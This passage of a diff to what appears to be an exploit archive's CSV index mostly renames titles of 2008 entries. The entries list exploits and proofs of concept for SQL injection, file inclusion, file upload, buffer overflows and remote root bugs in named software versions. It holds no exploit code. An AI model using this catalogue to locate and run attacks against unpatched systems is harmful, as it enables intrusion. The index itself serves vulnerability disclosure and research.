Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 @@ -4775,11 +4776,11 @@ id,file,description,date,author,platform,type,port 5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5134,platforms/php/webapps/5134.txt,"Joomla Component com_galeria - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5135,platforms/php/webapps/5135.txt,"WordPress Photo album Remote - SQL Injection",2008-02-16,S@BUN,php,webapps,0 -5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Remote File Upload",2008-02-17,ZoRLu,php,webapps,0 +5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - (download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 -5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'username' Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 +5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - ''Username'' Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,windows,local,0 5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - DLMFENC.sys Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0 5143,platforms/windows/local/5143.c,"DESlock+ <= 3.2.6 - Local Kernel Ring0 link list zero SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 @@ -4806,7 +4807,7 @@ id,file,description,date,author,platform,type,port 5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Blind SQL Injection",2008-02-20,NBBN,php,webapps,0 5165,platforms/php/webapps/5165.php,"PunBB 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0 5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - (productdetails.php) SQL Injection",2008-02-20,t0pP8uZz,php,webapps,0 -5167,platforms/linux/local/5167.sh,"X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition Exploit",2008-02-21,vl4dZ,linux,local,0 +5167,platforms/linux/local/5167.sh,"X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition",2008-02-21,vl4dZ,linux,local,0 5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - 'cid' SQL Injection",2008-02-21,"Mehmet Ince",php,webapps,0 5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir - 'id' SQL Injection",2008-02-21,S@BUN,php,webapps,0 5170,platforms/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,php,webapps,0 @@ -4829,10 +4830,10 @@ id,file,description,date,author,platform,type,port 5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - (members.asp uid) SQL Injection",2008-02-25,S@BUN,asp,webapps,0 5188,platforms/windows/remote/5188.html,"Rising AntiVirus Online Scanner - Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 5189,platforms/php/webapps/5189.pl,"DBHcms 1.1.4 - Remote File Inclusion",2008-02-25,Iron,php,webapps,0 -5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Buffer Overflow Exploit",2008-02-26,Elazar,windows,remote,0 -5191,platforms/multiple/dos/5191.c,"Apple Mac OS X xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0 +5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Buffer Overflow",2008-02-26,Elazar,windows,remote,0 +5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0 5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 -5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - (VAPGDecoder.dll 1.7.0.5) Buffer Overflow Exploit",2008-02-26,rgod,windows,remote,0 +5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - (VAPGDecoder.dll 1.7.0.5) Buffer Overflow",2008-02-26,rgod,windows,remote,0 5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - (Remote File Inclusion / Cross-Site Scripting / Remote Code Execution) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 5195,platforms/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection",2008-02-27,"it's my",php,webapps,0 5196,platforms/php/webapps/5196.pl,"eazyPortal 1.0 - 'cookie' SQL Injection",2008-02-27,Iron,php,webapps,0 @@ -4843,8 +4844,8 @@ id,file,description,date,author,platform,type,port 5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",windows,dos,0 5202,platforms/php/webapps/5202.txt,"barryvan compo manager 0.5pre-1 - Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 5203,platforms/php/webapps/5203.txt,"PHP-Nuke My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0 -5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - (get_image.php) Remote File Disclosure Exploit",2008-02-28,"Julien CAYSSOL",php,webapps,0 -5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Buffer Overflow Exploit",2008-02-29,Elazar,windows,remote,0 +5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - (get_image.php) Remote File Disclosure",2008-02-28,"Julien CAYSSOL",php,webapps,0 +5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Buffer Overflow",2008-02-29,Elazar,windows,remote,0 5206,platforms/php/webapps/5206.txt,"Koobi CMS 4.3.0 - 4.2.3 (categ) SQL Injection",2008-02-29,JosS,php,webapps,0 5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 @@ -4858,8 +4859,8 @@ id,file,description,date,author,platform,type,port 5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' SQL Injection",2008-03-06,S@BUN,php,webapps,0 5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,windows,dos,0 5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' SQL Injection",2008-03-06,S@BUN,php,webapps,0 -5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin Exploit",2008-03-07,"Charles Fol",php,webapps,0 -5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Remote Upload Exploit",2008-03-07,"Charles Fol",php,webapps,0 +5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin",2008-03-07,"Charles Fol",php,webapps,0 +5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Arbitrary File Upload",2008-03-07,"Charles Fol",php,webapps,0 5221,platforms/php/webapps/5221.txt,"Joomla Component Candle 1.0 - (cID) SQL Injection",2008-03-08,S@BUN,php,webapps,0 5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0 5223,platforms/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps,0 @@ -4867,7 +4868,7 @@ id,file,description,date,author,platform,type,port 5225,platforms/windows/dos/5225.html,"KingSoft - UpdateOcx2.dll SetUninstallName() Heap Overflow (PoC)",2008-03-10,void,windows,dos,0 5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - (cat) SQL Injection",2008-03-10,Don,php,webapps,0 5227,platforms/solaris/local/5227.c,"Solaris 8/9/10 - fifofs I_PEEK Local Kernel Memory Leak Exploit",2008-03-10,"Marco Ivaldi",solaris,local,0 -5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / null pointer",2008-03-10,"Luigi Auriemma",windows,remote,0 +5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote,0 5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0 5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection",2008-03-10,"Charles Fol",php,webapps,0 @@ -4888,25 +4889,25 @@ id,file,description,date,author,platform,type,port 5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143 -5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow Exploit",2008-03-14,haluznik,windows,remote,0 +5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0 5250,platforms/windows/local/5250.cpp,"VLC 0.8.6e - Subtitle Parsing Local Buffer Overflow",2008-03-14,"Mai Xuan Cuong",windows,local,0 5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - (roomid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - (online.php) Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0 -5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit",2008-03-14,kingcope,multiple,remote,0 +5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0 5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 5260,platforms/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5262,platforms/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 5263,platforms/php/webapps/5263.txt,"phpBP RC3 (2.204) FIX4 - SQL Injection",2008-03-16,irk4z,php,webapps,0 -5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow Exploit",2008-03-16,h07,windows,remote,0 +5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote,0 5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 - (theme) Multiple Local File Inclusion",2008-03-17,GoLd_M,php,webapps,0 5266,platforms/php/webapps/5266.txt,"phpAuction GPL Enhanced 2.51 - Multiple Remote File Inclusion",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0 -5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OS X/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0 +5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0 5269,platforms/windows/remote/5269.txt,"mg-soft net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,windows,dos,0 5273,platforms/php/webapps/5273.txt,"Joomla Component Acajoom (com_acajoom) - SQL Injection",2008-03-18,fataku,php,webapps,0 @@ -4917,18 +4918,18 @@ id,file,description,date,author,platform,type,port 5278,platforms/php/webapps/5278.txt,"Joomla Component Alberghi 2.1.3 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5280,platforms/php/webapps/5280.txt,"Joomla Component Restaurante 1.0 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5281,platforms/php/webapps/5281.php,"PEEL CMS - Admin Hash Extraction / Remote Upload Exploit",2008-03-19,"Charles Fol",php,webapps,0 +5281,platforms/php/webapps/5281.php,"PEEL CMS - Admin Hash Extraction / Arbitrary File Upload",2008-03-19,"Charles Fol",php,webapps,0 5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 5283,platforms/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0 5285,platforms/php/webapps/5285.txt,"RunCMS Module section - (artid) SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base - SQL Injection",2008-03-20,xcorpitx,php,webapps,0 5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,windows,local,0 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion",2008-03-21,0x90,php,webapps,0 -5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - (default pass) Remote Root",2008-03-21,"Pranav Joshi",hardware,remote,0 +5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - (default pass) Remote Root Exploit",2008-03-21,"Pranav Joshi",hardware,remote,0 5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' SQL Injection",2008-03-21,S@BUN,php,webapps,0 5291,platforms/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' SQL Injection",2008-03-21,S@BUN,php,webapps,0 5292,platforms/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection",2008-03-21,The:Paradox,php,webapps,0 -5293,platforms/php/webapps/5293.pl,"XLPortal 2.2.4 - (search) SQL Injection",2008-03-21,cOndemned,php,webapps,0 +5293,platforms/php/webapps/5293.pl,"XLPortal 2.2.4 - 'Search' SQL Injection",2008-03-21,cOndemned,php,webapps,0 5294,platforms/php/webapps/5294.txt,"joomla Components custompages 1.1 - Remote File Inclusion",2008-03-22,Sniper456,php,webapps,0 5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 - (dynamic_titles.php) SQL Injection",2008-03-22,Inphex,php,webapps,0 5296,platforms/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 - 'login.php' Local File Inclusion",2008-03-22,KnocKout,php,webapps,0 @@ -4940,7 +4941,7 @@ id,file,description,date,author,platform,type,port 5302,platforms/php/webapps/5302.txt,"PowerBook 1.21 - 'index.php' Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 5303,platforms/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 5304,platforms/cgi/webapps/5304.txt,"HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure",2008-03-24,"Zero X",cgi,webapps,0 -5305,platforms/php/webapps/5305.py,"destar 0.2.2-5 - Arbitrary Add Admin User Exploit",2008-03-24,nonroot,php,webapps,0 +5305,platforms/php/webapps/5305.py,"destar 0.2.2-5 - Arbitrary Add Admin",2008-03-24,nonroot,php,webapps,0 5306,platforms/multiple/dos/5306.txt,"snircd 1.3.4 - (send_user_mode) Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 5307,platforms/linux/dos/5307.pl,"MPlayer - sdpplin_parse() Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0 5308,platforms/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 - Arbitrary File Download",2008-03-25,"Jerome Athias",php,webapps,0 @@ -4996,7 +4997,7 @@ id,file,description,date,author,platform,type,port 5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - (reed) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 - (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0 -5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.DSR' File Local Buffer Overflow Exploit",2008-04-04,shinnai,windows,local,0 +5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.DSR' File Local Buffer Overflow",2008-04-04,shinnai,windows,local,0 5362,platforms/php/webapps/5362.txt,"Comdev News Publisher - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 @@ -5016,7 +5017,7 @@ id,file,description,date,author,platform,type,port 5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0 5380,platforms/php/webapps/5380.txt,"Blog PixelMotion - 'sauvBase.php' Arbitrary Database Backup",2008-04-06,JIKO,php,webapps,0 -5381,platforms/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Remote File Upload",2008-04-06,JIKO,php,webapps,0 +5381,platforms/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Arbitrary File Upload",2008-04-06,JIKO,php,webapps,0 5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'index.php categorie' SQL Injection",2008-04-06,parad0x,php,webapps,0 5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' SQL Injection",2008-04-06,S@BUN,php,webapps,0 5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,php,webapps,0 @@ -5027,22 +5028,22 @@ id,file,description,date,author,platform,type,port 5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - 'id' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - (project) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps,0 -5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 - (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0 +5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 - (maps plugin) Remote Command Execution",2008-04-07,EgiX,php,webapps,0 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 -5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow Exploit",2008-04-07,"Patrick Webster",windows,remote,0 +5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0 5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5402,platforms/php/webapps/5402.txt,"iScripts Socialware - 'id' SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 -5404,platforms/php/webapps/5404.php,"phpTournois G4 - Remote File Upload / Code Execution",2008-04-08,"Charles Fol",php,webapps,0 +5404,platforms/php/webapps/5404.php,"phpTournois G4 - Arbitrary File Upload / Code Execution",2008-04-08,"Charles Fol",php,webapps,0 5405,platforms/php/webapps/5405.txt,"exbb 0.22 - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - (editlink.php id) SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 -5407,platforms/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution Exploit",2008-04-08,EgiX,php,webapps,0 -5408,platforms/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution Exploit",2008-04-08,girex,php,webapps,0 +5407,platforms/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution",2008-04-08,EgiX,php,webapps,0 +5408,platforms/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution",2008-04-08,girex,php,webapps,0 5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - SQL Injection",2008-04-08,U238,asp,webapps,0 5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - (matchid) SQL Injection",2008-04-08,0in,php,webapps,0 5411,platforms/php/webapps/5411.txt,"Koobi Pro 6.25 - links SQL Injection",2008-04-08,S@BUN,php,webapps,0 @@ -5052,7 +5053,7 @@ id,file,description,date,author,platform,type,port 5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 -5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 +5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps,0 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0 @@ -5095,8 +5096,8 @@ id,file,description,date,author,platform,type,port 5458,platforms/linux/dos/5458.txt,"xine-lib 1.1.12 - NSF demuxer Stack Overflow (PoC)",2008-04-16,"Guido Landi",linux,dos,0 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 - WkImgSrv.dll ActiveX Denial of Service (PoC)",2008-04-17,"Shennan Wang",windows,dos,0 -5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote Buffer Overflow Exploit (Metasploit)",2008-04-17,oveRet,windows,remote,0 -5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File SEH Buffer Overflow",2008-04-18,muts,windows,local,0 +5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote Buffer Overflow (Metasploit)",2008-04-17,oveRet,windows,remote,0 +5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)",2008-04-18,muts,windows,local,0 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a - (location) Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - (category_id) SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 5465,platforms/php/webapps/5465.txt,"2532/Gigs 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,php,webapps,0 @@ -5130,7 +5131,7 @@ id,file,description,date,author,platform,type,port 5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Post-Authentication SQL Injection",2008-04-24,His0k4,php,webapps,0 5494,platforms/php/webapps/5494.txt,"minibb 2.2 - (Cross-Site Scripting / SQL Injection / Full Path Disclosure) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0 5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule - (eid) SQL Injection",2008-04-25,Kacper,php,webapps,0 -5496,platforms/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods Exploit",2008-04-25,callAX,windows,remote,0 +5496,platforms/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods",2008-04-25,callAX,windows,remote,0 5497,platforms/php/webapps/5497.txt,"Joomla Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,php,webapps,0 5498,platforms/windows/local/5498.py,"Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow",2008-04-25,j0rgan,windows,local,0 5499,platforms/php/webapps/5499.txt,"siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0 @@ -5153,7 +5154,7 @@ id,file,description,date,author,platform,type,port 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection",2008-04-28,K-159,php,webapps,0 5518,platforms/windows/local/5518.txt,"Microsoft Windows XP SP2 - 'win32k.sys' Privilege Escalation (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0 -5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0 +5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String",2008-04-28,EpiBite,windows,remote,0 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - (browse.videos.php category) SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure",2008-04-29,"Roberto Suggi Liverani",php,webapps,0 5522,platforms/php/webapps/5522.txt,"LokiCMS 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,php,webapps,0 @@ -5164,7 +5165,7 @@ id,file,description,date,author,platform,type,port 5527,platforms/php/webapps/5527.pl,"Joomla Component Webhosting - 'catid' Blind SQL Injection",2008-05-01,cO2,php,webapps,0 5528,platforms/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File 